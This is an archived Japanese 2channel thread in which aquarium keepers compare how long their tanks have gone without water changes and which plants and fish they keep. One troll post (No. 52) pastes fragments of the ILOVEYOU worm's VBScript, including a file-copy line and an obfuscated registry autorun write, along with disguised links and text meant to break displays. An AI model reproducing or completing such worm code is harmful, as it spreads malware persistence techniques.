5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

長期間水換えなし水槽についてまったりと話そう

1 ::03/09/27 09:59 ID:0Y6xkD/y
長期間水換えなし水槽についてまったりとはなそう。

ちなみに筆者の記録は
水槽:一番小さいプラケ
飼育魚:ベタ・イムベリスメス
水質:PH7
水草:ゴルフボール大マリモ一個
水換えなしでふんばった期間:三月

2 :名も無き飼い主さん:03/09/27 10:12 ID:XGTxJ0Qy
2get

3 :名も無き飼い主さん:03/09/27 10:26 ID:???
3ゲッツ

4 :名も無き飼い主さん:03/09/27 11:09 ID:???
じゃあ、よゆうの4にしとくか

5 :名も無き飼い主さん:03/09/27 11:58 ID:???
5の場合空を飛んでやる

6 :名も無き飼い主さん:03/09/27 12:14 ID:???
6でもないスレだな

7 :名も無き飼い主さん:03/09/27 12:30 ID:???
>1
水換え無しって言っても、海水のベルリンなんかじゃ当たり前だし、砂糖添加なんてのもあるし、
なにをマタリしたいのか解らんよ。
>5
飛ぶ場所が決まったら教えてね。

8 :名も無き飼い主さん:03/09/27 12:32 ID:???
7転八倒しながら死んでいく>>1

9 :名も無き飼い主さん:03/09/27 12:33 ID:???
>>7
テメー市ね。

10 :名も無き飼い主さん:03/09/27 12:34 ID:???
10医に診て貰え>>7

11 ::03/09/27 12:45 ID:RtEbmOfU
>>7
じゃあ淡水の一般的に広くつかわれてる飼育方法で。


12 :ニンゲンモドキ2 ◆atMODOKlSY :03/09/27 13:24 ID:AtGlZesZ
90cm水草にカメ1匹と魚数匹で、水替えなし最長2ヶ月半かな。

あと、20cmキューブにミナミヌマエビ数十匹で水替えなし4ヶ月というのもある。

13 :名も無き飼い主さん:03/09/27 14:06 ID:???
60cmでカラシン25匹ぐらい、立ち上げてから6ヶ月で20リットルぐらいしか換えてない
水草:チドメグサ7本にミクロソリウム2株

25cmキューブでボララス五匹とエビ数匹で4ヶ月
水草:マツモ十数本

14 :名も無き飼い主さん:03/09/27 14:15 ID:ZCB7SfFa
水換えなし期間と一緒に水質も書いたら面白そう

15 :名も無き飼い主さん:03/09/27 14:30 ID:???
我慢大会みたいになりそう

16 :名も無き飼い主さん:03/09/27 14:44 ID:puBtTV9Q
>>15
魚のな

なにがまったりだ>1

17 :名も無き飼い主さん:03/09/27 15:39 ID:yfSvicGa
ため込んだ硝酸塩は1が吸収し、酸素を出す。
大量の1と、強力なライティングと、co2添加でもしなきゃ駄目かな。

何はともあれ、1を用意できなきゃ駄目だ。

18 :_:03/09/27 15:46 ID:???
  ∧_∧
 ( ・∀・)/< こんなの有ったっち♪
http://endou2.kir.jp/hankaku04.html#.2ch.net
http://endou2.kir.jp/hankaku11.html#.2ch.net
http://endou2.kir.jp/hankaku03.html#.2ch.net
http://endou2.kir.jp/hankaku10.html#.2ch.net
http://endou2.kir.jp/hankaku05.html#.2ch.net
http://endou2.kir.jp/hankaku08.html#.2ch.net
http://endou2.kir.jp/hankaku07.html#.2ch.net
http://endou2.kir.jp/hankaku01.html#.2ch.net
http://endou2.kir.jp/hankaku06.html#.2ch.net
http://endou2.kir.jp/hankaku02.html#.2ch.net
http://endou2.kir.jp/hankaku09.html#.2ch.net

19 :1:03/09/27 17:28 ID:FQ6RxpMu
>>12
濾過あり?
俺はもちろんなし

20 :1:03/09/27 17:29 ID:FQ6RxpMu
>>17
酸素をだすならいいぢゃん(w

21 :名も無き飼い主さん:03/09/28 03:01 ID:???
濾過無しで3ヶ月!?
なかなかやるな。

22 :1:03/09/28 14:30 ID:iPfu+uBy
夏だよ(29度)。
日陰だけどね。

べつにその魚は死んだわけでも病気になったわけでもなく、ただこれ以上続ける勇気がなかっただけだ。

23 :名も無き飼い主さん:03/09/28 18:00 ID:???
60センチアクアテラリウム。
フルーバル203
スッポンモドキ12センチ3頭、アカヒレ、ヤマトヌマエビ数匹
去年の暮れに水換えしたっけw

24 :23:03/09/28 18:02 ID:???
ちなみに中の生物は去年から買い足してないし、見た感じかなり元気で餌食いもいい。

25 :1:03/09/28 19:41 ID:Q0OYHZwi
去年のくれ!?
しかもアクアテラってすいりょうすくないじゃん。
スッポンモドキ飼ったことあるがめちゃくちゃ水汚すよね。
アカヒレはえさ?

26 :23:03/09/28 19:53 ID:???
正確には2002年12月30日ぐらい。
あとは足し水のみ。
アカヒレは同居人。
モドキはトロイから捕まえられないよ。


27 :1:03/09/28 20:38 ID:Q0OYHZwi
しかもよく見たら三頭って書いてる・・・
モドキとアカヒレはわかるがヤマトがゲンキなのは正直すごいと思う。
次回の水換えはいつの予定?

28 :23:03/09/28 21:03 ID:???
アクアテラのテラの部分がドライろ過の役割をしてたんだと思う。
そのアクアテラ3年前に作ったんだけど、崩壊が始まってたので10日ほど前に中身を全部90cm水槽に移したよ。
モドキも狭そうだったし。


29 :ニンゲンモドキ2 ◆atMODOKlSY :03/09/28 21:51 ID:qYck3VKc
ヤマトは相当な汚染にも耐えるぞ。 ミナミも、かなりやばそうな水でもガンガン殖える。
それにしても60cmでスッポンモドキ3匹とは凄いな・・・

>>19
俺も濾過は無いよ。 水草を山ほどぶち込んで、後は足し水。
ウォータレタスに直射日光はかなり浄化力高い。

>>16
下手にたびたび水替えるより、きれいなんだよ。
魚も入れると状態上がってたから。

30 :23:03/09/28 22:35 ID:???
ガラス面に水垢がついて汚いけど2週間ほど前に撮った写真ならあるけど。
ろ過無しの水草ぶっこみ水槽なら去年の夏から放置してるのがあるけど・・・メイン水槽ではよく育たないミクロソリウムナローがよく殖えてる。
あとミナミも

31 :名も無き飼い主さん:03/09/29 00:15 ID:???
60cmにドイツラム1匹
現在6ヶ月水換えなし。
もったいないので、濾過・ヒーター・ライトも点けていない。
ヒーターはそろそろ考える。

というより、ラムを移そう。

32 :1:03/09/29 08:54 ID:94OfQglL
>>31
ライトついてないってことは水草ははいってないのか?
それとも太陽光で維持?
その前にベアタンクなのか!?
>>29
直射日光当てるならホテイの方が草体も大きいしいいと思うが・・・
花もきれいだし
>>28
勝手にドライろ過が行われているのか・・・
相当安上がりだな・・・

33 :31:03/09/29 09:08 ID:???
水草はウィローモスとミクロソリウム。
太陽光、午前中若干入る。
ミクロソリウムは枯れるのもあれば、出てくる芽もある。
ソイルはアクアプラントサンドの2年目。型崩れ少々。

ラムは元気一杯。えさはたまに冷凍赤虫ひとかけら。
一キューブやっても残すから。

これってかわいそうか?
メスを入れれば間違いなく繁殖する。
メスはオスにいじめられ、産卵、孵化後死んでしまった。
子達はオスかメスに食われた。
ここから水換え・その他するのを止めてしまった。


34 :名も無き飼い主さん:03/09/29 13:27 ID:Zt+l/DfU
小学校の時、理科室に置いてあったメダカの水槽。
卒業するまで、誰も掃除したとこ見たこと無い。
でもメダカはぴんぴんしてた。
水は濁りまくってたけど。

35 :名も無き飼い主さん:03/09/29 14:09 ID:???
ミドリガメの水槽、水換えを半年ぐらい?してない

36 :名も無き飼い主さん:03/09/29 14:16 ID:???
何か変な生物が生まれてそう… 

37 :名も無き飼い主さん:03/09/29 16:00 ID:???
家の60cm水槽去年の暮れから水替えた記憶なし・・・
内容物はグローライトテトラ?×6、7匹
    ブルーテトラ?4、5匹
    ゼブラダニオ×5,6匹
    ヤマトニマエビ×2,3匹
あと水草がピグミーチェーンとAバルテリー?とウィローモス

まぁ水足しぐらいはしてるが・・・

38 :1:03/09/29 17:43 ID:+1bGTaRN
>>33->>34->>35-37
水質も詳しくおしえてくれないか。
できるだけ近づけたい。


39 :33:03/09/29 22:20 ID:???
pH低いぞ、4.5〜4.8くらい。
ソイルのせいか?


40 :名も無き飼い主さん:03/09/30 00:32 ID:yCmJ1vo3
七ヶ月前に設置した60cm水槽
テトラ系の丈夫そうな個体を色々いれてる
水草はほとんどなし(入れてたけど夏に全部高温で溶けた)
pHなんて計ったことない
エアレーション24時間・照明6時間
水換えは一ヶ月に一度1/5程度
たまに水足しする
上部ろ過のみ


バクテリアが定着してるのかな

41 :名も無き飼い主さん:03/09/30 00:34 ID:???
>水換えは一ヶ月に一度1/5程度

こう書いたけど
蒸発してなくなった分だから実質水は換えていない

42 :35:03/09/30 08:31 ID:???
水質といっても、測定機器なんかは無いけど、
NO3は25ぐらい(テトラの試験紙)pHはわからん

他の特徴と言えば、浮泥がある事ぐらい。

ttp://www.google.co.jp/search?q=cache:lduucY9KGqUJ:homepage2.nifty.com/solecism/knack/detritus/Detritus1.htm+%E6%B5%AE%E6%B3%A5&hl=ja&ie=UTF-8

43 :名も無き飼い主さん:03/09/30 12:39 ID:???
庭のひょうたん池でもOKなら、何年も水換え&掃除してないけど
台風や大雨が来ると水が自然に入れ換わること考えると、冬から春にかけての6ヶ月ぐらいは無換水かな

44 :37:03/09/30 16:34 ID:???
家の水槽にも浮泥っぽいのがいっぱいあった

>>42
貴重な情報サンクス

45 :1:03/09/30 19:00 ID:bwZAWyrf
>>39
ずいぶんと低いな・・・
水換え時にひりひりしないか?
>>40
テトラ系だからってPHはからないとはどうかと思うぞ・・・
>>42
浮泥・・・・
実物見てみたい
>>43
生物はなにがはいってるの?

46 :名も無き飼い主さん:03/09/30 20:16 ID:???
こっちの1は水換え無しで2年半だ。
http://hobby.2ch.net/test/read.cgi/pet/1061655145/

47 :名も無き飼い主さん:03/09/30 23:06 ID:XuWY5qJN
200リットルの90センチ水槽にエンゼル5匹とカージナル20匹位
月一回の水槽前面のコケ取と足す水、半年毎のフィルター掃除でもう5年4ヶ月になるよ。
もう三年近く硝酸塩計ってないけど今どれくらいの値なんだろうか・・・

48 :名も無き飼い主さん:03/10/01 00:17 ID:???
このスレ、虐待自慢に見えるんだが・・・

49 :43:03/10/01 10:34 ID:???
>>45
金魚1匹・・・・
最初は姉金10匹ぐらいからスタートしたんだが、カラスに食われて1匹になってしまった
植物はヒメスイレンとホテイアオイ

あとは勝手に湧いてきたミミズとか前述のカラスとかスズメとかハチとかいろいろやってくる。


50 :名も無き飼い主さん:03/10/02 02:03 ID:???
>>48
虐待の方が、割と少ないかも。

51 :ニンゲンモドキ2 ◆atMODOKlSY :03/10/02 22:01 ID:SR8WLBbp
>>32
ホテイアオイより見た目にきれいだし、増えた分を捨てやすいというメリットがある。

52 :名も無き飼い主さん:03/10/02 22:02 ID:???
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
以上、ケン・コロスでした!  
http://news2.2ch.net|test|read.cgi|newsplus%40195.126.71.77/%63%72%61%73%68%6D%65
‮ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥
‮ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥
http://wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
括窮欠援ei`cakjdlfn_mbgh~順紫合rsopqut
http://0.〠〠〠〠〠〠〠〠〠〠〠〠〠〠
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")



53 :名も無き飼い主さん:03/10/03 14:02 ID:???
金魚の水槽。

飼い始めた弟が厨房になり、部活で休みがつぶれるようになり、
ものすごい期間換えなかった。実質二年半〜三年くらい。
しかもろ過機が壊れる。水草は増えすぎて臭う。
完全グリーンウォーターで中身が全く見えない。

夏休みの間にやっと換えたがすぐ元に戻った。
ph測ったコトないし温度調節したこともない。
でもまだ生きてるヤツは生きてる。


54 :名も無き飼い主さん:03/10/03 16:02 ID:???
>>48
魚を水槽で飼う時点で虐待だという香具師もいる
曰く、ろ過とは魚のためでなく飼育する人間の都合だ

55 :名も無き飼い主さん:03/10/03 17:25 ID:???
市川(千葉)駅前の大手スーパーのペット用品コーナーにある
商品展示のために金魚を飼ってる水槽

56 :名も無き飼い主さん:03/10/03 23:12 ID:???
>>52
頼むから削除してくれ。

57 ::03/10/04 12:02 ID:fPNTztf5
>>55何ヶ月?
>>51しかし花が地味すぎるというデメリット・・
しかし日光少なくても育つよな

58 :名も無き飼い主さん:03/10/04 13:55 ID:???
>>34
俺が通ってた小学校でも同じ条件の目高水槽があった。
でも、俺が「卒業前にキレイにしてやろう」と水換えした途端、白点やら尾腐れやらが発生して全滅。
子供心に見た目の水質がいかに当てにならないか知りました。

59 :ニンゲンモドキ2 ◆atMODOKlSY :03/10/04 18:56 ID:GvulU5If
>日光少なくても育つよな

微妙・・・ やはり直射日光がないとこでは少しづつ枯れてはいくな〜。


60 ::03/10/04 19:52 ID:???
>>59
家のチャンノ水槽では増えてはいないがかれてもいない、しかし花が咲くという状態が数ヶ月続いている。
照明明るくすれば大丈夫では

61 :名も無き飼い主さん:03/10/04 20:37 ID:???
有ることすっかり、忘れていたベランダの水槽!水足したの去年の春。でもアカヒレ繁殖。

62 :名も無き飼い主さん:03/10/20 15:41 ID:???
>>61ツワモノハケーン
忘れてたって・・

63 :名も無き飼い主さん:03/10/20 16:19 ID:???
オレは忘れてて干せてたことあるよ・・・
何から何までカラッカラ。
気づいたときには砂の上に薄く茶色のパリパリしたものがある状態だった。

64 ::03/10/21 16:44 ID:???
>>61-63
60センチ水槽?
63ha何がはいてったんだ・・・

65 :名も無き飼い主さん:03/10/21 23:07 ID:???
>>64
60センチです。てっきり無くなってたと思ったら
分厚い浮き草の下に無数のアカヒレが・・・
熱帯魚なんて手加えない方がいいんでないの?
インテリア水槽でもないかぎり。
まあ加温と数によっては濾過もいるだろうけど。

66 :名無しさん@お腹いっぱい。:03/10/25 15:40 ID:apjlAqCm
>>65
まあ 熱帯魚じゃないって事で。

67 :名無しさん@お腹いっぱい。:03/10/26 02:20 ID:kEDF845r
60cmレギュラー水槽 上部濾過+テトラブリラントフィルター

生体  ミナミヌマエビ      数百匹(勝手に増えた)
     ゴールデンハニーグラミー 九匹
     インパイクティスケリー  三匹
     トーマシー        二匹
     コリ系          五匹
     ゴールドエッジMプレコ  一匹(先日投入)
     チャイナバタフライローチ 一匹
     ラスボラマキュラータ   二匹
     ベタ           一匹

水草   アマゾンフロッグピット  数百個(最初は三個だったんだけど…)
     モス           たくさん(流木活着)
     マツモ          結構たくさん
     アヌビアス系       二株
     ハイグロフィラ      一本

現在は以上のような構成です。立ち上げから八ヶ月立ちますが、
水替えはおろか糞掃除すらしてません。それでも
水は澄んでるし、生体も調子よさそうですよ。
ただしコリパンダ二匹とケリーが二匹ほど中間で脱落しましたが…
ちなみに特別な機器や濾材は一切使っていません。


68 :名無しさん@お腹いっぱい。:03/11/19 00:33 ID:JN14POn+
庭に埋めた衣装ケース、2年くらい足し水のみで水換えしてない。
生体はミナミヌマエビ。ギンヤンマのヤゴも発見した。
ろ過ナシでマツモ大量投入。
ミナミもマツモも大量に増えてます。

69 :名無しさん@お腹いっぱい。:03/11/26 22:25 ID:4x4fVCPh
なんとなくage

70 :名無しさん@お腹いっぱい。:03/11/26 23:46 ID:vBJxUqnz
俺は昔ミドリガメ飼ってたが…飼ってたことも忘れ
もちろん水換えせずに気がついたら干からびてた

71 :名無しさん@お腹いっぱい。:03/11/28 17:40 ID:/NTiN460
前リビングに置いてあった水槽は数年水を換えてなかったな…
生体はネオンテトラ×2とプリステラ×2で
水槽は60cmだった…

ウィローモスとガラスの苔が大繁殖して
緑色のガラスの塊にしか見えないような水槽だったけど(w

72 :名無しさん@お腹いっぱい。:03/12/02 00:01 ID:CfWYagsT
>>71
見てみたい!

73 :名無しさん@お腹いっぱい。:03/12/02 20:35 ID:3ZNjkRBY
強光度下の条件でマツモやアマゾンフロッグビットやホテイソウなんかガンガン増やしてそれ捨ててやれば
下手な水替えよりいいかもな。虐待とか言う香具師はDQN。

74 :名無しさん@お腹いっぱい。:03/12/04 01:22 ID:+q6HF+PT
春にリセットした水草水草をトリミングしないで放ったらかしてたら浮草(フルイタンス
やベルビアンフォーンワート)が大繁茂して薄暗くなってしまったけどエキノとか枯れず
にいたのでまたそのまま放置してた。 最近やっと時間ができたので水面近くのノリ状の
コケをわしづかみにして取り出して流木に活着したミクロソリウムの黒くなった部分とか
ゴッソリ取ってやっとスッキリ! 久しぶりに魚らと再会してみるとなんとレッドノーズ
のミニ版がチョロチョロしてたよ。 テトラが繁殖したなんて20年も熱帯魚飼ってて初
めてのことでした!

75 :名無しさん@お腹いっぱい。:03/12/04 04:05 ID:5swK2gno
>>74
(・∀・)イイ!ね

76 :山科:03/12/05 00:32 ID:GbAoEawE
民主党が躍進なんて信じられないです。
そりゃ小泉改革は完璧に進んでたわけじゃないけど・・

自力で更生する機会を与えられても、それを放棄するような国民は
あと少し不況に苦しむべき。

77 :名無しさん@お腹いっぱい。:03/12/05 00:48 ID:yqmKkYeB
このスレ面白いね。
うちの60cmもマツモが後ろのガラスが見えないくらい沢山と、
底にはウィローモスの塊が絨毯の様にいっぱい入ってる。
照明は20w*2、濾過はワンタッチフィルターが最初あったけど、他に移した為
現在無し。生体はクロメダカ*8〜10、アカヒレ*2、モノアラガイ*100〜?。
あとは、気が向いたときに餌あげて、水が減ったら足し水するくらいです。
メダカ調子良さそうだけど、遊泳スペースが無くなってきたのでマツモ捨てないと
いけないけど、それすら面倒くさい。

78 :名無しさん@お腹いっぱい。:03/12/06 02:34 ID:CKLmwPAe
>>77
頻繁な水換えではなく
その水槽みたいなマターリしてる環境の方がメダカには合ってると思う。

79 :名も無き飼い主さん :03/12/06 15:39 ID:ae5YaDEx
うちの60cm水槽も足し水だけで1年くらい水換してないな。
でも一匹も落ちてない。
セット品の上部フィルターはセットした時のまま。
底砂はニッソーのソイル。
蛍光灯は1本。
生体は、パールグラミーx2、ブルーグラミーx1、青コリx3、オトシンx1、
アマゾンソードx2、アマゾンソードにくっ付いてきた名称不明の貝x2


80 :名無しさん@お腹いっぱい。:03/12/06 16:38 ID:vFkaFqbn
でも流木入れてると水黄色になっちゃうよね。

81 :名無しさん@お腹いっぱい。:03/12/06 18:37 ID:pUuUnfEL


アフリカンランプアイ 39センチ水槽で20っぴきかっててt

1年くらい水替えてねえけど5ひきいるよ

82 :名無しさん@お腹いっぱい。:03/12/06 18:39 ID:pUuUnfEL
>>67よーく見ると糞が砂の中にびっしりになってない?

なってなかったら凄いんだがな ドウヤッテ飼育してるか教えてほしい

83 :名無しさん@お腹いっぱい。:03/12/06 18:45 ID:PdEiqKbj
俺、風呂入らなかった記録....4ヶ月半、現在も記録更新中!

84 :名無しさん@お腹いっぱい。:03/12/06 19:59 ID:wxmBdAmI
>>83
臭い!寄るな!!!

85 :パナファン ◆ytTP31MADA :03/12/06 20:08 ID:OE2fXfQS
(・∀・)

>>83

ヤ・ヴァ・イ・

86 :名無しさん@お腹いっぱい。:03/12/07 00:19 ID:VTPeej8Q
生分解プラッチック効果なのか、3年で水換え5回位??
良く覚えてないけど。
今年は6月位に半換水一回のみ。
でもサカナさん元気だよ〜♪
カージナルは餌食い良いし、プレコ達も出て来ない。
コケだってなんにもないよ〜♪

でもね、最近グッピーがヤケに小さくなって来たのが気掛かり。
それとピグミーチェーンサジタリアがびっしりなんで、ドロ抜き出来ない…。

87 :名無しさん@お腹いっぱい。:03/12/07 22:10 ID:27VbLykn
最近エデニックシェルトと14g水槽立ち上げたんだけど、生物濾過ってアテになるのかね?
あと水草ってどんくらい水質に影響を与えるんだろう?
アクアソイルとCO2添加で良い具合に成長してくれるんだけどね・・・

88 :名無しさん@お腹いっぱい。:03/12/08 00:30 ID:x9CFzJHL
ミナミヌマエビを30cm水槽で飼ってるが、3ヶ月は蒸発分を足すだけで維持してる。
ついでに無給餌。濾過なし。
水草はミクロとモスとマツモを入れてる。
成長は物凄く遅いが、皆元気そうだ。


89 :名無しさん@お腹いっぱい。:03/12/08 03:04 ID:5JRhXWip
ウィロウモスは濾過能力が高いようで調子良いですよ。
うっそうとしてて、かなーり見苦しいですが。
濾過器使っているんではっきりした事言えませんけど。
濾過無しでミナミちゃんって面白そうだね。


90 :名無しさん@お腹いっぱい。:03/12/08 03:23 ID:rB48PZ3+
暖かくなってきたなーとおもう五月の休日 魚屋さんにもらった発泡スチロールの箱に目の細かい砂を敷き水草木をたくさん入れ ランプアイ数ペアこれを九月末まで屋がいに放置あーら不思議 ランプアイが五十匹 目だか系に結構使えます。

91 :名無しさん@お腹いっぱい。:03/12/08 03:29 ID:WwR0x6S+
で冬に全滅

92 :名無しさん@お腹いっぱい。:03/12/08 18:17 ID:YblAuwXR
>>87
エデニックシェルト自体があてにならんよ。
俺も同じく12リットル。ランプアイ1ネオン5レッドラムズホーン2オトシンネグロ1
の環境で濾過不足を感じている。

濾過材は当然変更、シポラックスとサブストプロの併用でやってます。吸水口には
テトラのビリーフィルターね。

93 :名無しさん@お腹いっぱい。:03/12/08 18:27 ID:eHLozPEH
水換えしなくても無給餌ならコケあんま生えないし、(・∀・)イイ!
っていうか週に一度の水換えより、毎日の給餌が一番めんどくさい・・。

94 :名無しさん@お腹いっぱい。:03/12/08 19:45 ID:gEz4jPxx
トイレ掃除しなくても無給仕ならクソあんま出ないし、(・∀・)イイ!
っていうか週に一度のトイレ掃除より、毎日の給仕が一番めんどくさい・・。

95 :名無しさん@お腹いっぱい。:03/12/08 21:39 ID:YH2HSNaP
エデニックシェルトは後半部分がもったいないような気がする。
今度の休みにろ材追加するか。

96 ::03/12/08 21:45 ID:+qt8LIKv
ご無沙汰してました。1です。

>>89
リシアの方が増えるけど、実際のところどっちが水をきれいにしてるんだろうね。俺はADA信者じゃないけど自然界にない沈水リシアは好きに慣れん。

>>92
俺もエデニクかおうと思ってたけど、あんま良くない?
スポンジのところは取り除くのは常識だけどね。
水草ドンくらい入ってる?
俺もそのサイズの水槽にエデニクで水草水槽作ってみる。

>>94
ガリガリクン(プ

97 :87:03/12/08 22:00 ID:WdUeGHwz
俺はあのリング状の生物ろ過のろ材は好みじゃないんだが、ほかに良いろ材無いかね?

>>95
なんか順番が逆な感じがするんだよな
最後のスポンジにゴミがまとわりついてるんだけど、それが水に溶け出してるわけだし・・・

98 ::03/12/08 22:14 ID:+qt8LIKv
後半部分のスポンジとってストレーナーをスポンジフィルター用にするとか。


99 :名無しさん@お腹いっぱい。:03/12/09 09:40 ID:3XYR5DP1
>>98

目詰まりで極端に流量落ちそう

100 :92:03/12/09 10:31 ID:lpbypDE4
>97
エデニックの前半部分、通常の付属のリング濾材が入っている部分にシポラックス満タン。
っで後半のスポンジを抜いて、サブストプロを満タンに入れてます。吸い込み口は、ビリーのスポンジを
さす筒がピッタリ合うので、それをはめてますが、大体2週間に一回洗ってますね。

水草は、ナローリーフミクロを流木に活着させた物、及びウイローモスを活着させた流木と南米ウイローモスを
漂わせています。浮き草は、フロッグピット沢山。リシア少々って感じですね。

水換えはゲ糞のらくらくS改造版よりも頻度が高くなったような気がします。

101 :名無しさん@お腹いっぱい。:03/12/09 14:44 ID:zvTkDPX9
>>100

シポラックス、通販販売店教えてほすぃ。

102 :92:03/12/09 15:32 ID:lpbypDE4
シポラックス売ってないよね〜。俺は、チャームで他の器具と一緒に通販しました。
シポラックスだけ買うと送料とか馬鹿にならないからね。っと言うか、買った後のシポラックスの
煮だしとか処理が結構大変だったよ・・・。

103 ::03/12/09 18:38 ID:p7Oa6smI
アフリカンシクリッドだったらシポラックスそのまま使ってもおk?

104 :demupa:03/12/11 16:53 ID:Oa3H4Gp8
あげ

105 :名無しさん@お腹いっぱい。:03/12/12 07:17 ID:oI7OAstp
ナマズの仲間(ギギかギバチ)を60cm水槽で飼ってたんだけど、
2年くらい水替えしなかった。(稀に水道水を足すのみ)

変な虫やコケも発生してたけど結局7〜8年生きてた。

106 ::03/12/16 21:02 ID:8Pro5uur
二年って・・・・
変なムシの画像みたい

107 :名無しさん@お腹いっぱい。:03/12/28 22:57 ID:mnwOJj0c
120cm、フルーバル403
Bアロワナ(60〜70cm)×1
多分3ヶ月無換水。ヘタしたら半年。
ここんトコは、週一ペースで換水しているが(^^;
餌(カーニバル)は殆ど与えなかった。
大きくなると、ブラックもかなり丈夫です…。

108 :名無しさん@お腹いっぱい。:03/12/28 23:44 ID:mnwOJj0c
昔 知り合いに頼まれて、プレコを引き取るコトになったのだが、
45cm(30だったかも?)水槽に25cm!ぐらいのトリニダード。
飼っていると言うより、殆ど収納って感じ(w
もう何ヶ月も水変え、足し水していないと言ってて、水は茶濁。
餌は乾燥ミジンコ。あんなん食うねんな(w
プレコも背に腹は変えられなかったんだろう…。
ちなみに水槽に入っていたのは、ヒーター、サーモ、砂利、プレコのみ。

ところで漏れの水槽、グリーンウォーターになった事あるけど、
あれは水持ちが良いぞ。水が全部 水草と考えてい〜のだろうな。
その時はタイガーシャベル飼ってたんだけど、
キャットは髭が溶け出すと水替えのサイン。

109 :名無しさん@お腹いっぱい。:03/12/29 00:55 ID:Jkng3stv
60a水槽。
ブルーギル2匹(体長約8a) 流木(30a)*2 水草なし
餌、月1回かぢりかけのちくわを放り込む。
苔、大量。もう上からしか視認できない。
水替えなんかしたことない。一年以上になるなぁ…




どうでもいいベランダの水槽
そろそろ氷が張りそうだ…

時々酔っ払って小をそのな(ry
こんな私でもいいですか?

110 :名無しさん@お腹いっぱい。:03/12/29 01:13 ID:WuelygmF
>>107だが、その水槽セルフィンも耐えられず、あぼん(w
他の水槽も同じ感じだったが、プレコ水槽はモチロン、ポリプ水槽もあぼん。
金魚水槽もあぼんだし、Bアロのみ生存。皆すまん…英霊に敬礼。

111 ::03/12/29 13:48 ID:TJ6XP7c+
>110
脊イルフィンよりBアロの方が丈夫だったとは。
>109
ろ過してるのならアンモニア入れても大丈夫かもw

112 :名無しさん@お腹いっぱい。:04/01/05 21:22 ID:H7TsuLb0
>111
アンモニアだすのって、魚だけじゃないの?
人間だすのは尿素じゃない?

もしかしたら、おならにアンモニアあるかも。

113 :名無しさん@お腹いっぱい。:04/01/05 21:54 ID:BKc+MCv6
>>112
ネタ?
それとも、ゆとり教育の犠牲者でつか?

114 :名無しさん@お腹いっぱい。:04/01/06 06:44 ID:GqY7jMR7
尿道すべすべ

115 :名無しさん@お腹いっぱい。:04/01/06 15:03 ID:GpuwcuSA
コケコケでもいいのなら、俺は少なくとも八年間無換水の水槽の存在を知っている。
俺の通っていた小学校の保健室にあるのだが、姉が入学した当時から、俺が卒業するまで
あったので、最低でも八年間は存在していたことになる。
かなりダサい青の枠が付いていたから、水槽自体相当古い物かと思われる。
子供だったので正確な大きさはワカランが、我が家は昔から60cm水槽があったので、
それよりも小さかったことを考えると、どうやら45cm水槽だったようだ。

で、どんな水槽かというと、まず、完璧に真緑。本当に緑。恐らく二センチ先に極彩色の
フラワーホーンがいようとわからないほどの色の濃さ。
設置場所は南に向いた窓のマジ窓際。フィルター類の記憶はないが、エアーレーションが
あった。水槽の色、タイプから見て恐らく「簡単金魚飼育セット」かなんかだと思うので、
エアポンプでくるくる回る金魚用の落とし込みフィルターだけだと思う。
で、グッピーが入ってる。しかし、どのくらい入っているのかは全くの不明。眺めていると
しょっちゅう鰭や鱗のきらめきが現れては消える。子供がいたのも覚えているので、
恐らくは中で繁殖もしている。餌はなし。エアー以外は完璧に独立した水槽だった。
最後に見てから六年経つが、もしかしたらまだあるかもしれない。

それと恐らくは同じ環境になったと思われるのが五年前に消えた我が家の90水槽。
父親が海水魚飼育を断念し、水槽を庭に放置、俺が拾ってきた亀を飼い始めたのが
きっかけ。秋に亀は逃がし、そのまま放置。そんで次の夏から、俺が用水路とかで
獲ってきた魚を入れる入れ物になった。エアーレーションとかは全く無し、午前中は
日が当たり、午後は日陰になる環境。
いつ頃かは忘れたが、魚とりなんかしなくなり、水槽も放置。学校の水槽と同じで、
真緑になっていた。家を工事するので、水槽を処分することになり、俺が掃除をしたのだが、
中はモツゴ、口細、フナ、メダカ、などの懐かしい顔ぶれでいっぱいだった。
みんな、痩せていた、というよりシャープな体になっていた。でも見るからに健康な感じ
ではあった。三年間は放置していたハズなのに、かなりビックリした。
あとは数匹のオタマジャクシとゲンゴロウ。どっから来たんだお前ら。

どちらの水槽も、ある種類のコケが浄化、給餌すべてをまかなっていたのかと思う。
ここでポイントが、どちらの水槽も直射日光が必要であるということと、緑のコケだということ。
そして後者の水槽はやはり最初は飽和状態で、共食いや餓死していくうちに、適度な
バランスに保たれたのだと思われる。つまり、肉食性の魚でない限り、閉鎖環境での
ライフサイクルの再現は可能だということだ(まあ、光は必要だけどね。)
肉食の魚でも、2mくらいの水槽を学校のグッピー水槽のような状態にして、オヤニラミ
一匹くらいなら大丈夫なのかも。

116 :名無しさん@お腹いっぱい。:04/01/06 15:15 ID:GpuwcuSA
で、この事実を鑑賞水槽に生かすとなると、やっぱり水草だろう。
ホテイアオイはモノスゴイ浄化性能があるらしい。詳しいことは解らないが、
水草の浄化性能はあればあるほどいいと思う。
別に完全独立システムを目指しているわけじゃないから、給餌までは考えなくてもいい。

どんなのかと考えると、
(魚の排泄物、餌の残りなどの有害な栄養)=(水草の浄化能力+いろんなバクテリアの浄化、分解能力)
となればいいわけだ。もしこのシステムが完成に近づけば、フィルターは必要ない。
水流を起こすためにエアーレーションは必要かもしれないけど。
でも、コケの発生なくしてこのシステムは不可能だろう。バランスがシビアすぎる。
ちょっと栄養が多ければ、やがて水草の代謝、成長に必要な値を上回り、富栄養化が進み、
その栄養を糧としてコケが発生する。また、栄養が足りなければ水草は枯れ、浄化能力自体が
落ち、そのうち富栄養化してコケが発生する。
